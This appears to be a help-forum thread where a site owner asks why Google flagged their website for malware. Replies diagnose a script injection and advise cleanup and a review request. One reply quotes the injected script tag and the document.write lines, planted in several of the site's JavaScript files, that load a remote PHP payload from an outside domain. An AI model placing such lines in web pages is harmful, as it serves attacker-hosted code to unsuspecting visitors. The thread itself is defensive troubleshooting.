I need to know why my site was flagged with Malware
by mpearson
9 months ago

Hi my site got flagged by google and I’m not sure why. Can someone please help me. My url is www.coastalcashexchange.com Any help will be appreciated. Thanks

by anirban
9 months ago

Hello :-),

Jaal Scan ID # 390390252749-825 output

Malicious code detected on line 7 of www.coastalcashexchange.com

starts with
<!—Scr ipts/AC_RunActive Content.js>

Please look at the copy of the page on the server, if you cannot locate this code, it is probably being injected at runtime, when a user is requesting the page. It might be useful to then wipe out the hosting directory and check for malware, on the server and in the backend database. You can also ask for help from your hosting provider. Please check out other pages too.

If you have any specific issues feel free to ask for help.

Also, I am collecting info from people affected by attacks like this, if it would be possible for you to share your experience, could you kindly shoot me a mail at a.banerje e @ s top the hac ker .com (please remove the spaces).

We also provide vulnerability identification and mitigation services to help websites from being infected in the first place.

It might be useful to go through my blog post:
http://www.stopthehacker.com/2009/10/28/when-benign-scripts-attack/

Hope this helps,
-A

Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
Site:www.stopthehacker.com
Blog:www.stopthehacker.com/blog
Jaal: Protecting the Internet, one website at a time™

by redleg
9 months ago

This line is present in your files

<sc ript src=http://worphueser.de/032c0698b3108c214/032c0698b31084b13.php >

located between the </head> and <body> tags. If you do not see it in the source for your pages it is being inserted when the page is requested.

It is also present in your javascript files such as

http://www.coastalcashexchange.com/Scripts/AC_RunActiveContent.js
http://www.coastalcashexchange.com/Scripts/swfobject_modified.js
http://www.coastalcashexchange.com/SpryAssets/SpryMenuBar.js

by the line(s)

document.write(‘<scr ipt
src=http://worphueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>’);

by 12056
9 months ago

Remove all references to: factafix.com, worphueser.de, worphueser.de

then use Google WebMaster Tools to request a review.

by yemlat
9 months ago

I also have a similar case with Google, how do i request for a review since their contact is not on the webmaster tools page. Already the website www.samkupong.com has been verified by Google and it is still displaying the warning flag?

About Contact Us Terms & Conditions Privacy Policy Copyright